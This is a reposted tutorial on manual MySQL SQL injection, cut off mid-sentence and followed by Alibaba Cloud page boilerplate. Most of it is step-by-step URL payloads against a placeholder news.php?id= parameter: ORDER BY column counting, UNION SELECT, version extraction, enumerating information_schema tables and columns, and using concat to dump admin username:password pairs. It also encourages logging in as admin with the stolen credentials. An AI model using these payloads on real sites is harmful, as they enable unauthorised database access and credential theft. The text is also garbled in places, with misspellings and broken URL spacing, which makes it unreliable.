Manual Advanced Injection of mysql (English version and Chinese Version)

Source: Internet
Author: User
Tags md5 hash

1. SQL Injection (classic or error based or whatever you call it): D...
2. Blind SQL Injection (the harder part)

So lets start with some action: D

1). Check for vulnerability
Lets say that we have some site like this
Http://www.site.com/news.php? Id = 5
Now to test if is vulrnable we add to the end of url (quote ),
And that wocould be http://www.site.com/news.php? Id = 5
So if we get some error like "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right etc..." or something similar
That means is vulrnable to SQL injection :)
2). Find the number of columns (column -- CCOz note)
To find number of columns we use statement order by (tells database how to order the result)
So how to use it? Well just incrementing (add -- CCOz note) the number until we get an error.
Http://www.site.com/news.php? Id = 5 order by 1/* <-- no error ("/*" whats the meaning? -- CCOz)
Http://www.site.com/news.php? Id = 5 order by 2/* <-- no error
Http://www.site.com/news.php? Id = 5 order by 3/* <-- no error
Http://www.site.com/news.php? Id = 5 order by 4/* <-- error (we get message like this Unknown column 4 in order clause or something like that)
That means that the it has 3 columns, cause we got an error on 4.
3). Check for UNION function
With union we can select more data in one SQL statement.
So we have
Http://www.site.com/news.php? Id = 5 union all select 1, 2, 3/* (we already found that number of columns are 3 in section 2 ).)
If we see some numbers on screen, I. e 1 or 2 or 3 then the UNION works :)
4). Check for MySQL version
Http://www.site.com/news.php? Id = 5 union all select 1, 2, 3/* NOTE: if/* not working or you get some error, then try -- its a comment and its important for our query to work properly.
Let say that we have number 2 on the screen, now to check for versionwe replace the number 2 with @ version or version () and get someting like 4.1.33-log or 5.0.45 or similar.
It shoshould look like this http://www.site.com/news.php? Id = 5 union all select 1, @ version, 3 /*
If you get an error "union + illegal mix of collations (IMPLICIT + COERCIBLE )..."
I didnt see any paper covering this problem, so I must write it :)
What we need is convert () function
I. e.
Http://www.site.com/news.php? Id = 5 union all select 1, convert (@ version using latin1), 3 /*
Or with hex () and unhex ()
I. e.
Http://www.site.com/news.php? Id = 5 union all select 1, unhex (hex (@ version), 3 /*
And you will get MySQL version: D
5). Getting table and column name
Well if the MySQL version is <5 (I. e 4.1.33, 4.1.12 ...) <--- later I will describe for MySQL> 5 version. we must guess table and column name in most cases.
Common table names are: user/s, admin/s, member/s...
Common column names are: username, user, usr, user_name, password, pass, passwd, pwd etc...
I. e wocould be
Http://www.site.com/news.php? Id = 5 union all select 1, 2, 3 from admin/* (we see number 2 on the screen like before, and thats good: D)
We know that table admin exists...
Now to check column names.

Http://www.site.com/news.php? Id = 5 union all select 1, username, 3 from admin/* (if you get an error, then try the other column name)
We get username displayed on screen, example wocould be admin, or superadmin etc...
Now to check if column password exists
Http://www.site.com/news.php? Id = 5 union all select 1, password, 3 from admin/* (if you get an error, then try the other column name)
We seen password on the screen in hash or plain-text, it depends of how the database is set up :)
I. e md5 hash, mysql hash, sha1...
Now we must complete query to look nice :)
For that we can use concat () function (it joins strings)
I. e
Http://www.site.com/news.php? Id = 5 union all select 1, concat (username, 0x3a, password), 3 from admin /*
Note that I put 0x3a, its hex value for: (so 0x3a is hex value for colon)
(There is another way for that, char (58), ascii value :)

Http://www.site.com/news.php? Id = 5 union all select 1, concat (username, char (58), password), 3 from admin /*
Now we get dislayed username: password on screen, I. e admin: admin or admin: somehash
When you have this, you can login like admin or some superuser: D
If cant guess the right table name, you can always try mysql. user (default)
It has user I password columns, so example wocould be
Http://www.site.com/news.php? Id = 5 union all select 1, concat (user, 0x3a, password), 3 from mysql. user /*
6). MySQL 5
Like I said before im gonna explain how to get table and column namesin MySQL> 5.
For this we need information_schema. It holds all tables and columns in database.
To get tables we use table_name and information_schema.tables.
I. e
Http://www.site.com/news.php? Id = 5 union all select 1, table_name, 3 from information_schema.tables /*
Here we replace the our number 2 with table_name to get the first table from information_schema.tables
Displayed on the screen. Now we must add LIMIT to the end of query to list out all tables.
I. e
Http://www.site.com/news.php? Id = 5 union all select 1, table_name, 3 from information_schema.tables limit 0, 1 /*
Note that I put 0, 1 (get 1 result starting from the 0th)
Now to view the second table, we change limit 0, 1 to limit 1, 1
I. e
Http://www.site.com/news.php? Id = 5 union all select 1, table_name, 3 from information_schema.tables limit 1, 1 /*
The second table is displayed.
For third table we put limit 2, 1
I. e
Http://www.site.com/news.php? Id = 5 union all select 1, table_name, 3 from information_schema.tables limit 2, 1 /*
Keep incrementing until you get some useful like db_admin, poll_user, auth, auth_user etc...: D
To get the column names the method is the same.
Here we use column_name and information_schema.columns
The method is same as abve so example wocould be

Http://www.site.com/news.php? Id = 5 union all select 1, column_name, 3 from information_schema.columns limit 0, 1 /*
The first column is diplayed.
The second one (we change limit 0, 1 to limit 1, 1)
Ie.

Http://www.site.com/news.php? Id = 5 union all select 1, column_name, 3 from information_schema.columns limit 1, 1 /*
The second column is displayed, so keep incrementing until you get something like
Username, user, login, password, pass, passwd etc...: D
If you wanna display column names for specific table use this query. (where clause)
Lets say that we found table users.
I. e
Http://www.site.com/news.php? Id = 5 union all select 1, column_name, 3 from information_schema.columns where table_name = users /*
Now we get displayed column name in table users. Just using LIMIT we can list all columns in table users.
Note that this wont work if the magic quotes is ON.
Lets say that we foun

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.